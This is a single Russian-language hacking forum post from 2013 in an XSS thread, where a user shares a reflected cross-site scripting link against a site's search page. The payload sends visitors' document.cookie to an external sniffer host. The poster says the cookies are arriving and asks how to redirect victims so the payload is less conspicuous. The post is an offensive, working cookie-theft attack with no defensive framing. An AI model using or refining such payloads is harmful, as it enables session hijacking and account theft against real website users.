Тема: XSS [Mega Big Bug]
Показать сообщение отдельно

  #189  
Старый 30.03.2013, 01:00
dddoomsday
Новичок
Регистрация: 24.03.2013
Сообщений: 7
С нами: 6914486

Репутация: -2
По умолчанию

Столкулся с такой проблемой, почему то редирект не работает, на одном сайте нашел пассивку, уязвимость существует на поисковике сайта.
Ядовитая ссылка: http://уязвимый.сайт.ру/search/all?q="> img = new Image(); img.src = "http://сниффер.ру/s.gif?"+document.cookie;
cookies приходит нормально), но ппц палится, просто на просто этот код "> img = new Image(); img.src = "http://сниффер.ру/s.gif?"+document.cookie; остается на поисковике уязвимого сайта и не направляет на другой сайт. В чем может быть проблема?

если использовать location.href ="http://адрес_редиректа/" то куки вообще не приходит.
 
Ответить с цитированием